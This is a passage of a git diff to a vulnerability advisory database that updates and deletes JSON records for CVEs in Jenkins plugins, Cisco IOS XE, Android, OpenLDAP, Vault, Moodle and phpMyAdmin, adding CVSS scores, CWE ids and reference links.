- "CVE-2019-1003077"
- ],
- "details": "A missing permission check in Jenkins Audit to Database Plugin in the DbAuditPublisherDescriptorImpl#doTestJdbcConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003077"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-977"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/107790"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-862"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-04-04T16:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-4m9r-j9f4-4m4g/GHSA-4m9r-j9f4-4m4g.json b/advisories/unreviewed/2022/05/GHSA-4m9r-j9f4-4m4g/GHSA-4m9r-j9f4-4m4g.json
index b72da23412a62..043af9e74da1e 100644
--- a/advisories/unreviewed/2022/05/GHSA-4m9r-j9f4-4m4g/GHSA-4m9r-j9f4-4m4g.json
+++ b/advisories/unreviewed/2022/05/GHSA-4m9r-j9f4-4m4g/GHSA-4m9r-j9f4-4m4g.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-4m9r-j9f4-4m4g",
- "modified": "2022-05-24T17:45:11Z",
+ "modified": "2024-02-07T18:30:26Z",
 "published": "2022-05-24T17:45:11Z",
 "aliases": [
 "CVE-2021-1220"
 ],
 "details": "Multiple vulnerabilities in the web UI of Cisco IOS XE Software could allow an authenticated, remote attacker with read-only privileges to cause the web UI software to become unresponsive and consume vty line instances, resulting in a denial of service (DoS) condition. These vulnerabilities are due to insufficient error handling in the web UI. An attacker could exploit these vulnerabilities by sending crafted HTTP packets to an affected device. A successful exploit could allow the attacker to cause the web UI software to become unresponsive and consume all available vty lines, preventing new session establishment and resulting in a DoS condition. Manual intervention would be required to regain web UI and vty session functionality. Note: These vulnerabilities do not affect the console connection.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ }
 ],
 "affected": [
 
diff --git a/advisories/unreviewed/2022/05/GHSA-4mvc-33v7-cqc3/GHSA-4mvc-33v7-cqc3.json b/advisories/unreviewed/2022/05/GHSA-4mvc-33v7-cqc3/GHSA-4mvc-33v7-cqc3.json
deleted file mode 100644
index 96d1fe6267ccb..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-4mvc-33v7-cqc3/GHSA-4mvc-33v7-cqc3.json
+++ /dev/null
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-4mvc-33v7-cqc3",
- "modified": "2022-05-13T01:25:16Z",
- "published": "2022-05-13T01:25:16Z",
- "aliases": [
- "CVE-2019-1003087"
- ],
- "details": "A missing permission check in Jenkins Chef Sinatra Plugin in the ChefBuilderConfiguration.DescriptorImpl#doTestConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003087"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1037"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/107790"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-862"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-04-04T16:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-4px9-cjxh-m369/GHSA-4px9-cjxh-m369.json b/advisories/unreviewed/2022/05/GHSA-4px9-cjxh-m369/GHSA-4px9-cjxh-m369.json
index 6c3de5bfc9f9e..aa09d943b58d6 100644
--- a/advisories/unreviewed/2022/05/GHSA-4px9-cjxh-m369/GHSA-4px9-cjxh-m369.json
+++ b/advisories/unreviewed/2022/05/GHSA-4px9-cjxh-m369/GHSA-4px9-cjxh-m369.json
@@ -26,6 +26,10 @@
 "type": "WEB",
 "url": "https://kb.juniper.net/KB27375"
 },
+ {
+ "type": "WEB",
+ "url": "https://supportportal.juniper.net/JSA10568"
+ },
 {
 "type": "WEB",
 "url": "http://secunia.com/advisories/53359"
diff --git a/advisories/unreviewed/2022/05/GHSA-5293-3fgp-cr3x/GHSA-5293-3fgp-cr3x.json b/advisories/unreviewed/2022/05/GHSA-5293-3fgp-cr3x/GHSA-5293-3fgp-cr3x.json
deleted file mode 100644
index 2a57117e14a68..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-5293-3fgp-cr3x/GHSA-5293-3fgp-cr3x.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-5293-3fgp-cr3x",
- "modified": "2022-05-13T01:18:19Z",
- "published": "2022-05-13T01:18:19Z",
- "aliases": [
- "CVE-2017-1000086"
- ],
- "details": "The Periodic Backup Plugin did not perform any permission checks, allowing any user with Overall/Read access to change its settings, trigger backups, restore backups, download backups, and also delete all previous backups via log rotation. Additionally, the plugin was not requiring requests to its API be sent via POST, thereby opening itself to Cross-Site Request Forgery attacks.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000086"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2017-07-10/"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/100437"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-862"
- ],
- "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2017-10-05T01:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-5339-9974-hqj9/GHSA-5339-9974-hqj9.json b/advisories/unreviewed/2022/05/GHSA-5339-9974-hqj9/GHSA-5339-9974-hqj9.json
deleted file mode 100644
index 51cb8aff47f1b..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-5339-9974-hqj9/GHSA-5339-9974-hqj9.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-5339-9974-hqj9",
- "modified": "2022-05-14T02:21:28Z",
- "published": "2022-05-14T02:21:28Z",
- "aliases": [
- "CVE-2018-1999039"
- ],
- "details": "A server-side request forgery vulnerability exists in Jenkins Confluence Publisher Plugin 2.0.1 and earlier in ConfluenceSite.java that allows attackers to have Jenkins submit login requests to an attacker-specified Confluence server URL with attacker specified credentials.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1999039"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2018-07-30/#SECURITY-982"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-918"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-08-01T13:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-5532-prrf-rf5x/GHSA-5532-prrf-rf5x.json b/advisories/unreviewed/2022/05/GHSA-5532-prrf-rf5x/GHSA-5532-prrf-rf5x.json
deleted file mode 100644
index ed082a44804e6..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-5532-prrf-rf5x/GHSA-5532-prrf-rf5x.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-5532-prrf-rf5x",
- "modified": "2022-05-13T01:41:14Z",
- "published": "2022-05-13T01:41:14Z",
- "aliases": [
- "CVE-2017-1000403"
- ],
- "details": "Jenkins Speaks! Plugin, all current versions, allows users with Job/Configure permission to run arbitrary Groovy code inside the Jenkins JVM, effectively elevating privileges to Overall/Run Scripts.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000403"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2017-10-11/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-732"
- ],
- "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-01-26T02:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-55v6-vvqw-j3qq/GHSA-55v6-vvqw-j3qq.json b/advisories/unreviewed/2022/05/GHSA-55v6-vvqw-j3qq/GHSA-55v6-vvqw-j3qq.json
index ddbc26bf343c9..07478d23271cc 100644
--- a/advisories/unreviewed/2022/05/GHSA-55v6-vvqw-j3qq/GHSA-55v6-vvqw-j3qq.json
+++ b/advisories/unreviewed/2022/05/GHSA-55v6-vvqw-j3qq/GHSA-55v6-vvqw-j3qq.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-55v6-vvqw-j3qq",
- "modified": "2022-05-24T17:08:53Z",
+ "modified": "2024-02-02T15:30:27Z",
 "published": "2022-05-24T17:08:53Z",
 "aliases": [
 "CVE-2020-0022"
 ],
 "details": "In reassemble_and_dispatch of packet_fragmenter.cc, there is possible out of bounds write due to an incorrect bounds calculation. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-143894715",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -37,7 +40,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-682"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-56ff-m6pv-8594/GHSA-56ff-m6pv-8594.json b/advisories/unreviewed/2022/05/GHSA-56ff-m6pv-8594/GHSA-56ff-m6pv-8594.json
deleted file mode 100644
index c1929eb70d2e9..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-56ff-m6pv-8594/GHSA-56ff-m6pv-8594.json
+++ /dev/null
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-56ff-m6pv-8594",
- "modified": "2022-05-13T01:25:16Z",
- "published": "2022-05-13T01:25:16Z",
- "aliases": [
- "CVE-2019-1003079"
- ],
- "details": "A missing permission check in Jenkins VMware Lab Manager Slaves Plugin in the LabManager.DescriptorImpl#doTestConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003079"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-979"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/107790"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-862"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-04-04T16:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-56gj-927p-mfph/GHSA-56gj-927p-mfph.json b/advisories/unreviewed/2022/05/GHSA-56gj-927p-mfph/GHSA-56gj-927p-mfph.json
deleted file mode 100644
index cb788e936905a..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-56gj-927p-mfph/GHSA-56gj-927p-mfph.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-56gj-927p-mfph",
- "modified": "2023-10-25T18:31:25Z",
- "published": "2022-05-24T16:55:59Z",
- "aliases": [
- "CVE-2019-10397"
- ],
- "details": "Jenkins Aqua Security Serverless Scanner Plugin 1.0.4 and earlier transmitted configured passwords in plain text as part of job configuration forms, potentially resulting in their exposure.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10397"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-09-12/#SECURTY-1509"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/09/12/2"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-319"
- ],
- "severity": "LOW",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-09-12T14:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-56xw-8wf9-j3x9/GHSA-56xw-8wf9-j3x9.json b/advisories/unreviewed/2022/05/GHSA-56xw-8wf9-j3x9/GHSA-56xw-8wf9-j3x9.json
index 95bd1ea910fc4..3d6fce7fdc5f6 100644
--- a/advisories/unreviewed/2022/05/GHSA-56xw-8wf9-j3x9/GHSA-56xw-8wf9-j3x9.json
+++ b/advisories/unreviewed/2022/05/GHSA-56xw-8wf9-j3x9/GHSA-56xw-8wf9-j3x9.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-56xw-8wf9-j3x9",
- "modified": "2022-05-02T03:13:43Z",
+ "modified": "2024-02-08T03:32:44Z",
 "published": "2022-05-02T03:13:43Z",
 "aliases": [
 "CVE-2009-0231"
 ],
 "details": "The Embedded OpenType (EOT) Font Engine (T2EMBED.DLL) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted name table in a data record that triggers an integer truncation and a heap-based buffer overflow, aka \"Embedded OpenType Font Heap Overflow Vulnerability.\"",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -49,7 +52,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-119"
+ "CWE-119",
+ "CWE-681"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-5794-fx2j-p63j/GHSA-5794-fx2j-p63j.json b/advisories/unreviewed/2022/05/GHSA-5794-fx2j-p63j/GHSA-5794-fx2j-p63j.json
index 3ff9b790d99ff..1d1dc23f32b93 100644
--- a/advisories/unreviewed/2022/05/GHSA-5794-fx2j-p63j/GHSA-5794-fx2j-p63j.json
+++ b/advisories/unreviewed/2022/05/GHSA-5794-fx2j-p63j/GHSA-5794-fx2j-p63j.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-5794-fx2j-p63j",
- "modified": "2022-05-01T07:31:47Z",
+ "modified": "2024-02-08T03:32:44Z",
 "published": "2022-05-01T07:31:47Z",
 "aliases": [
 "CVE-2006-5779"
 ],
 "details": "OpenLDAP before 2.3.29 allows remote attackers to cause a denial of service (daemon crash) via LDAP BIND requests with long authcid names, which triggers an assertion failure.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
 ],
 "affected": [
 
@@ -113,7 +116,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-617"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-57gg-cj55-q5g2/GHSA-57gg-cj55-q5g2.json b/advisories/unreviewed/2022/05/GHSA-57gg-cj55-q5g2/GHSA-57gg-cj55-q5g2.json
deleted file mode 100644
index 6fc288a2ea88f..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-57gg-cj55-q5g2/GHSA-57gg-cj55-q5g2.json
+++ /dev/null
@@ -1,51 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-57gg-cj55-q5g2",
- "modified": "2022-05-24T22:01:23Z",
- "published": "2022-05-24T22:01:23Z",
- "aliases": [
- "CVE-2020-25816"
- ],
- "summary": "Token leases could outlive their TTL in HashiCorp Vault",
- "details": "HashiCorp Vault and Vault Enterprise 1.0 before 1.5.4 have Incorrect Access Control.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-25816"
- },
- {
- "type": "WEB",
- "url": "https://github.com/hashicorp/vault/pull/10020/commits/f192878110fe93eb13da914b2bee28caa7866a29"
- },
- {
- "type": "WEB",
- "url": "https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#147"
- },
- {
- "type": "WEB",
- "url": "https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#154"
- },
- {
- "type": "WEB",
- "url": "https://www.hashicorp.com/blog/category/vault"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-613"
- ],
- "severity": "CRITICAL",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2020-09-30T20:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-5c3m-78cg-3wpv/GHSA-5c3m-78cg-3wpv.json b/advisories/unreviewed/2022/05/GHSA-5c3m-78cg-3wpv/GHSA-5c3m-78cg-3wpv.json
index ce8881fca6046..69edaa49d0978 100644
--- a/advisories/unreviewed/2022/05/GHSA-5c3m-78cg-3wpv/GHSA-5c3m-78cg-3wpv.json
+++ b/advisories/unreviewed/2022/05/GHSA-5c3m-78cg-3wpv/GHSA-5c3m-78cg-3wpv.json
@@ -40,6 +40,10 @@ { "type": "WEB", "url": "https://seclists.org/oss-sec/2019/q4/101" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/06/3" } ], "database_specific": { diff --git a/advisories/unreviewed/2022/05/GHSA-5g93-pf3w-6f59/GHSA-5g93-pf3w-6f59.json b/advisories/unreviewed/2022/05/GHSA-5g93-pf3w-6f59/GHSA-5g93-pf3w-6f59.json index 4d0a08661d2d7..7037f29de3ac4 100644 --- a/advisories/unreviewed/2022/05/GHSA-5g93-pf3w-6f59/GHSA-5g93-pf3w-6f59.json +++ b/advisories/unreviewed/2022/05/GHSA-5g93-pf3w-6f59/GHSA-5g93-pf3w-6f59.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5g93-pf3w-6f59", - "modified": "2022-05-24T19:13:29Z", + "modified": "2024-02-02T03:30:31Z", "published": "2022-05-24T19:13:29Z", "aliases": [ "CVE-2021-30663" ], "details": "An integer overflow was addressed with improved input validation. This issue is fixed in iOS 14.5.1 and iPadOS 14.5.1, tvOS 14.6, iOS 12.5.3, Safari 14.1.1, macOS Big Sur 11.3.1. Processing maliciously crafted web content may lead to arbitrary code execution.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/05/GHSA-5h4f-x39p-f6v8/GHSA-5h4f-x39p-f6v8.json b/advisories/unreviewed/2022/05/GHSA-5h4f-x39p-f6v8/GHSA-5h4f-x39p-f6v8.json index f7cfd4b966692..cefdd26f25702 100644 --- a/advisories/unreviewed/2022/05/GHSA-5h4f-x39p-f6v8/GHSA-5h4f-x39p-f6v8.json +++ b/advisories/unreviewed/2022/05/GHSA-5h4f-x39p-f6v8/GHSA-5h4f-x39p-f6v8.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5h4f-x39p-f6v8", - "modified": "2022-05-24T17:02:39Z", + "modified": "2024-02-08T21:30:32Z", "published": "2022-05-24T17:02:39Z", "aliases": [ "CVE-2019-11930" ], "details": "An invalid free in mb_detect_order can cause the application to crash or potentially result in remote code execution. This issue affects HHVM versions prior to 3.30.12, all versions between 4.0.0 and 4.8.5, all versions between 4.9.0 and 4.23.1, as well as 4.24.0, 4.25.0, 4.26.0, 4.27.0, 4.28.0, and 4.28.1.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-763" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-5jph-mvfm-r27p/GHSA-5jph-mvfm-r27p.json b/advisories/unreviewed/2022/05/GHSA-5jph-mvfm-r27p/GHSA-5jph-mvfm-r27p.json deleted file mode 100644 index e38d8ab8af4bf..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-5jph-mvfm-r27p/GHSA-5jph-mvfm-r27p.json +++ /dev/null 
@@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-5jph-mvfm-r27p", - "modified": "2022-05-13T01:12:43Z", - "published": "2022-05-13T01:12:43Z", - "aliases": [ - "CVE-2015-0218" - ], - "details": "Cross-site request forgery (CSRF) vulnerability in auth/shibboleth/logout.php in Moodle through 2.5.9, 2.6.x before 2.6.7, 2.7.x before 2.7.4, and 2.8.x before 2.8.2 allows remote attackers to hijack the authentication of arbitrary users for requests that trigger a logout.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0218" - }, - { - "type": "WEB", - "url": "https://moodle.org/mod/forum/discuss.php?d=278618" - }, - { - "type": "WEB", - "url": "http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-47964" - }, - { - "type": "WEB", - "url": "http://openwall.com/lists/oss-security/2015/01/19/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2015-06-01T19:59:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-5pjj-7m4p-wfh2/GHSA-5pjj-7m4p-wfh2.json b/advisories/unreviewed/2022/05/GHSA-5pjj-7m4p-wfh2/GHSA-5pjj-7m4p-wfh2.json deleted file mode 100644 index 47633ac1e7eae..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-5pjj-7m4p-wfh2/GHSA-5pjj-7m4p-wfh2.json +++ /dev/null 
@@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-5pjj-7m4p-wfh2", - "modified": "2022-05-17T02:04:28Z", - "published": "2022-05-17T02:04:28Z", - "aliases": [ - "CVE-2010-4338" - ], - "details": "ocrodjvu 0.4.6-1 on Debian GNU/Linux allows local users to modify arbitrary files via a symlink attack on temporary files that are generated when Cuneiform is invoked as the OCR engine.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-4338" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64892" - }, - { - "type": "WEB", - "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=598134" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/45234" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-59" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2011-01-20T19:00:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-5pvv-f8h3-gw96/GHSA-5pvv-f8h3-gw96.json b/advisories/unreviewed/2022/05/GHSA-5pvv-f8h3-gw96/GHSA-5pvv-f8h3-gw96.json deleted file mode 100644 index cbb933651716f..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-5pvv-f8h3-gw96/GHSA-5pvv-f8h3-gw96.json +++ /dev/null 
@@ -1,107 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-5pvv-f8h3-gw96", - "modified": "2022-05-02T03:47:43Z", - "published": "2022-05-02T03:47:43Z", - "aliases": [ - "CVE-2009-3696" - ], - "details": "Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.11.x before 2.11.9.6 and 3.x before 3.2.2.1 allows remote attackers to inject arbitrary web script or HTML via a crafted name for a MySQL table.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3696" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=528769" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53742" - }, - { - "type": "WEB", - "url": "https://www.redhat.com/archives/fedora-package-announce/2009-October/msg00467.html" - }, - { - "type": "WEB", - "url": "https://www.redhat.com/archives/fedora-package-announce/2009-October/msg00490.html" - }, - { - "type": "WEB", - "url": "http://bugs.gentoo.org/show_bug.cgi?id=288899" - }, - { - "type": "WEB", - "url": "http://dfn.dl.sourceforge.net/project/phpmyadmin/phpMyAdmin/2.11.9.6/phpMyAdmin-2.11.9.6-notes.html" - }, - { - "type": "WEB", - "url": "http://dfn.dl.sourceforge.net/project/phpmyadmin/phpMyAdmin/3.2.2.1/phpMyAdmin-3.2.2.1-notes.html" - }, - { - "type": "WEB", - "url": "http://freshmeat.net/projects/phpmyadmin/releases/306667" - }, - { - "type": "WEB", - "url": "http://freshmeat.net/projects/phpmyadmin/releases/306669" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-security-announce/2009-10/msg00004.html" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=125553728512853&w=2" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=125561979001460&w=2" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/37016" - }, - { - "type": "WEB", - "url": "http://typo3.org/extensions/repository/view/phpmyadmin/4.5.0/" - 
}, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-015/" - }, - { - "type": "WEB", - "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2009:274" - }, - { - "type": "WEB", - "url": "http://www.phpmyadmin.net/home_page/security/PMASA-2009-6.php" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/36658" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2009/2899" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2009-10-16T16:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-5q7j-8hpc-4848/GHSA-5q7j-8hpc-4848.json b/advisories/unreviewed/2022/05/GHSA-5q7j-8hpc-4848/GHSA-5q7j-8hpc-4848.json deleted file mode 100644 index d3759e2911525..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-5q7j-8hpc-4848/GHSA-5q7j-8hpc-4848.json +++ /dev/null 
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-5q7j-8hpc-4848", - "modified": "2022-05-14T01:38:17Z", - "published": "2022-05-14T01:38:17Z", - "aliases": [ - "CVE-2018-1000421" - ], - "details": "An improper authorization vulnerability exists in Jenkins Mesos Plugin 0.17.1 and earlier in MesosCloud.java that allows attackers with Overall/Read access to initiate a test connection to an attacker-specified Mesos server with attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000421" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-1013%20(2)" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/106532" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-918" - ], - 